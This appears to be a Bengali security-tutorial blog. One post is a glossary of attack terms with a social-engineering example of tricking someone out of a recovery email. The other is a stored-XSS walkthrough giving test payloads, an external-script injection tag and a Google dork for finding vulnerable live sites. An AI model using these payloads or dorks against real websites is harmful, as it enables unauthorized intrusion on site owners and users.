Saturday, January 27, 2018

সিকিউরিটির ব্যাপারে গুরুত্বপূর্ন কিছু বিষয়

একজন সিকিউরিটি এক্সপার্টের অন্য সবার চাইতে জ্ঞান বেশী থাকা প্রয়োজন, এই ভিডিওটিতে আমরা কিছু বিষয় নিয়ে আলোচনা করব যেগুলো সম্পর্কে এথিকাল হ্যাকারের ধারনা থাকা  উচিৎ।


পোর্ট কি?
----------
পোর্ট দিয়ে আমরা সহজ বাংলায় সংযোগ স্থল বুঝি। কম্পিউটার থেকে আমরা অনেক ধরনের সার্ভিস পেয়ে থাকি। কম্পিউটার একই সাথে অনেক গুলো নেটওয়ার্কের সাথে সংযুক্ত হতে পারে। আমরা কম্পিউটার যেসব কাজে ব্যাবহার করি, নেটওয়ার্ক পোর্ট ছাড়া তার সব কিছুই প্রায় অচল। আমাদের কম্পিউটারের ইউএসবি, ইথারনেট এগুলোকে হার্ডওয়ার পোর্ট বলে আর টিসিপি, এফটিপি, ডি এন এস, সিকিউর শেল এগুলোকে ভার্চুয়াল পোর্ট বলা হয়। একটা ওয়েব সার্ভারে ফাইল ট্রান্সফারের জন্য এফ টিপি পোর্ট ২১, এবং ওয়েবসাইট সার্ফিঙ্গের জন্য পোর্ট ৮০ ও ৮০৮০ ব্যাবহার করা হয়। এমন অনেক পোর্ট আছে যেগুলোর একেকটা একেক কাজে ব্যাবহার করা হয়। কোন পোর্ট কি কাজে ব্যাবহার করা হয় এগুলো সম্পর্কে আপনার ধারনা থাকতে হবে।

ডি ডস কি?
-----------
ড ও স, যার অর্থ ড্যানিয়েল অফ সার্ভিস। আর ডি ডস যার অর্থ ডিস্ট্রিবিউটেড ড্যানিয়েল অফ সার্ভিস। এটা ওয়ান অফ দা মোস্ট কমন সাইবার অ্যাটাক। ডি ডস দিয়ে যে কোন সাইট/সার্ভার শাট ডাউন করা যায়। এটা করতে খুব বেশী জানতে হয় না। ধরা যাক আপনি এক বালতি পানি বহন করতে পারেন, এখন আপনার উপর তিন বালতি পানি চাপিয়ে দিলে নিশ্চই আপনি আর দাঁড়িয়ে থাকবেন না? ডি ডস এও ঠিক এই জিনিষ টা হয়, ট্রাফিক অভারলোড হয়ে গেলে ক্রাশ করে।

আর এ টি
------------

রিমোট এ্যাডমিন্সট্রেটিভ টুল/ রিমোট এক্সেস ট্রোজান। ট্রোজান নাম শুনেই হয়ত বুঝতে পারছেন এটার কি কাজ।  এগুলো সাধারনত টার্গেটের অজান্তেই তার কাংখিত ফাইলের সাথে অনাকাংখিত ভাবে ডাউনলোড হয়ে যায়। এটি ভিক্টিমকে মনিটিরং এর কাজে ব্যাবহার করা হয়। এগুলো ডিটেক্ট করা ইকটু কঠিন কারণ রানিং টাস্কে ইনভিজিবল হয়ে থাকে। এগুলো ডিটেক্ট করার সবচাইতে ভাল এবং ফ্রি টুল অ্যান্টি ম্যালওয়্যার বাইট।

মেটাস্প্লইট
-------------
এটা একটা ফ্রেমওয়ার্ক, যেটায় অনেক গুলো টুলস একসাথে ব্যাবহার করা যায়।  এটা ওয়ান অফ দা মোস্ট ইউজড পেনটেস্টিং টুল। এটা উইন্ডোজ, উবান্টু, ম্যাক সব অপারেটিং সিস্টেমে ব্যাবহার করা যায়। ভাল এথিকাল হ্যাকারের এই টুলস গুলো ব্যাবহার জানা উচিৎ।

সোশাল ইঞ্জিনিয়ারিং
------------------------
এটাকে হিউম্যান হ্যাকিং এর সাথে তুলনা করা যায়। আপনি কারো সাথে কথা বলে তাকে এক্সপ্লিয়ট করার জন্য অনেক প্রয়োজনীয় তথ্য বের করতে পারেন, ধরা যাক আপনার কারো জিমেইল এড্রেস প্রয়োজন যেটা দিয়ে তার কোন গুরুত্বপূর্ন একাউন্ট রিকভার করা যায়। আপনি তাকে কোন লোভনীয় অফার দিয়ে তাকে আপনার একাউন্টে মেইল করতে বললেন এবং সে আপনাকে মেইল করল। এটাই সোশাল ইঞ্জিনিয়ারিং।

ডক্সিং
--------
 আমাদের ব্যাবহার করা তথ্য ছড়িয়ে ছিটিয়ে আছে পুরো ইন্টারনেট জুড়ে। আমরা নিজের অজান্তেই শেয়ার করে ফেলি এমন কিছু তথ্য যেগুলো ব্যাবহার করে একজন হ্যাকার আপনার সম্পর্কে অনেক কিছু জেনে যেতে পারে। আপকি কোথায় থাকেন, কি করেন, কোথায় যান, কি খান, আপনার ফ্যামিলি মেম্বার্স এছাড়াও অনেক ইনফর্মেশন বের করে ফেলা যায়। কোথায় কি শেয়ার করছেন ভেবে চিনতে শেয়ার করা গুরুত্বপূর্ন।

স্পুফিং
---------

স্পুফিং এর এক্সাম্পল যমুনা টিভিতে হওয়া প্রোগ্রামে দেওয়া হয়েছিল। আপনি বাংলাদেশ ব্যাংক থেকে একটি মেইল পেলেন যেটায় বলা হল আপনি অনেক টাকা জিতেছেন, কিন্তু খোজ নিয়ে দেখলেন কৃতপক্ষ এ ব্যাপারে  কিছুই জানে না। এটাই স্পুফিং, আপনি অন্য কারও আইন্ডেন্টিটি ব্যাবহার করে নিজের লেখা কিছু ভিক্টিমের কাছে পাঠিয়ে দিলেন। ইরানের এক হ্যাকার স্পুফিং করে ড্রোন হ্যাক করে নামিয়ে এনেছিল।

র‍্যান্সামওয়ার
---------------
এটা একটা ম্যালিশিয়াস প্রোগ্রাম যেটা আপনার কম্পিউটারের সব ফাইল এনক্রাইপ্ট করতে শুরু করে এবং একটা নিদৃষ্ট এমাউন্ট পে না করলে ফাইল আর ফিরে পাওয়া যায় না। এগুলো আন্ট্রাস্টেড সাইট থেকে ডাউনলোড, ইমেইলের মাধ্যমে ছড়ায়।

কি লগার
------------
কি লগার আপনি আপনার পিসি অন করার পর থেকে কত বার কিবোর্ডের কোন কি, কত বার প্রেস করেছেন সব সেভ করে রাখে, ফেসবুক, ইমেল সহ সব ধরনের একাউন্ট হ্যাক করতে কি লগার ব্যাবহার করা হয়।

ওয়্যারলেস টেকনোলজি
---------------------------
একটা ওয়্যারলেস নেটওয়ার্ক হ্যাক করতে হলে আপনাকে অব্যশই সেটা সম্পর্কে ভাল ভাবে জানতে হবে। এনক্রিপশন অ্যালগরিদন WPA, WEP, WPA2 এগুলো সম্পর্কে ধারণা থাকতে হবে।

ডাটাবেজ
------------
ওয়েবসাইটের ডাটাবেজ এ অ্যাক্সেসের জন্য আপনাকে SQL জানতে হবে। SQL injection করে একটা ওয়েবসাইটের ডাটাবেজ থেকে তথ্য বের করা যায়। SQL Injection অনেক ধরনের হয়, এগুলো সম্পর্কে আপনার ধারণা থাকতে হবে।

কোড ইঞ্জেকশন
------------------------

একটা কোড ইঞ্জেকশন যেটার সাহায্যে কোন ওয়েবসাইটে ক্ষতিকর কোড প্রবেশ করানো যায়। এজন্য সাধারনত সাইটের ইনপুট ফিল্ড গুলো ব্যাবহার করা হয়। এ সম্পর্কে টিউটোরিয়াল আর কিভাবে কাজ করে আমাদের ব্লগে ব্যাখ্যা করা হয়েছে, কারো পড়তে ইচ্ছা করলে দেখে নিতে পারেন।


আজ এ পর্যন্তই, পরবর্তী ভিডিও খুব শীঘ্রই আসবে আর এর পর থেকে সব টিউটোরিয়াল ভিডিওতে করার চেষ্টা করব, চ্যানেল সাবস্ক্রাইব করে রাখতে পারেন। স্পেসিফিক কিছু নিয়ে জানার ইচ্ছা থাকলে কমেন্ট করুন, বলার চেষ্টা করব।


Sunday, January 14, 2018

পার্সিস্টেন্ট ক্রস সাইট স্ক্রিপ্টিং

আজকে কথা বলব  পার্সিস্টেন্ট ক্রস সাইট স্ক্রিপ্টিং নিয়ে, ডোম বেজড স্ক্রিপ্টীং নিয়ে কথা বলার কথা ছিল কিন্তু ডোম বেজড এক্স এক্স এস পার্সিস্টেন্ট আর নন পার্সিস্টেন্ট ক্রস সাইট স্ক্রিপ্টিং এর ভ্যারিয়েন্ট। এই টিউটোরিয়াল কারো কোন ক্ষতি করার উদ্দেশ্যে ব্যাবহার না করার অনুরোধ করছি।

আমরা দেখব পার্সিস্টেন্ট ক্রস সাইট স্ক্রিপ্টিং এ একটা ওয়েব সাইটে কি কি করা যায়, আর কিভাবে বুঝতে হয়।




পার্সিস্টেন্ট ক্রস সাইট স্ক্রিপ্টিংএ ম্যালিশিয়াস কোড ওয়েব সাইটের ডাটা বেজে স্টোর করা যায়। পার্সিস্টেন্ট স্ক্রিপ্টিংএ অনেক ট্রিকি ক্রাফ্ট আছে সেগুলো নিয়ে পরে কথা বলব। এখন আমাদের বুঝতে হবে পার্সিস্টেন্ট বাগ কোথায় পাওয়া যাবে।

 কমেন্ট, সাবমিট ফর্ম, পোস্ট, কন্ট্যাক্ট, সাবমিশন বক্স সাইটের যে অংশ গুলো ডাটাবেজের সাথে সম্পৃক্ত সে জায়গা গুলো টেস্ট করতে হবে।


উপরে যে সাবমিশন বক্স দেখছেন, যেখানে নাম চাওয়া হচ্ছে আমরা এটা টেস্ট করে দেখব। প্রথমেই <i> ট্যাগ ব্যাবহার করে দেখা যাক। সাবমিট বক্সে ট্যাগ বসানোর পর সাবমিট বাটনে ক্লিক করব।


ট্যাগ ব্যাবহারের পর কি কোন পরিবর্তন চোখে পড়ছে? ট্যাগ ব্যাবহারের পর মোর ইনফরমেশন শব্দ দুটি ডান দিকে বেকে গেছে। এবার ফন্ট কালার চেঞ্জের ট্যাগ ব্যাবহার করে দেখা যাক। <font color="red"> লিখে সাবমিট বাটনে ক্লিক করব।

 দেখুন রঙ বদলে গেছে। এখন স্ক্রিপ্ট ট্যাগ ব্যাবহার করব, স্ক্রিপ্টে একটা পপ আপ এল্যার্ট থাকবে। <script>alert("Vulnerable To XSS")</script>



এবার আমরা একটা রিডাইরেক্ট ব্যাবহার করে দেখব।


এটা আমাদের গুগল সার্চে রিডাইরেক্ট করবে।


মাঝে মাঝে ইনপুট টেক্সট লিমিটেশন থাকে, আপনি চাইলে স্ক্রিপ্ট ট্যাগে জাভাস্ক্রিপ্ট ফাইল লিংক করে দিতে পারেন এভাবে <script src="https://www.YourSite.com/xss.js></script>

ভূলনার্বাল ওয়েবসাইট খুজে বের করতে গুগল ডর্ক ব্যাবহার করতে পারেন।


  • inurl:.com/search.asp


আজ এ পর্যন্তই, পরের পোস্টে আরো এডভান্স জিনিষ শেখানোর চেষ্টা করব। এই টিউটোরিয়াল কারো ক্ষতির উদ্দ্যেশ্য ব্যাবহার না করার অনুরোধ আবারো করছি।

 সেমিস্টার ফাইনাল নিয়ে ব্যাস্ত ছিলাম টিউটোরিয়াল লেখার সময় হচ্ছিল না। কারো কোন প্রশ্ন থাকলে ব্লগে কমেন্ট করুন, আমি উত্তর দিতে চেষ্টা করব।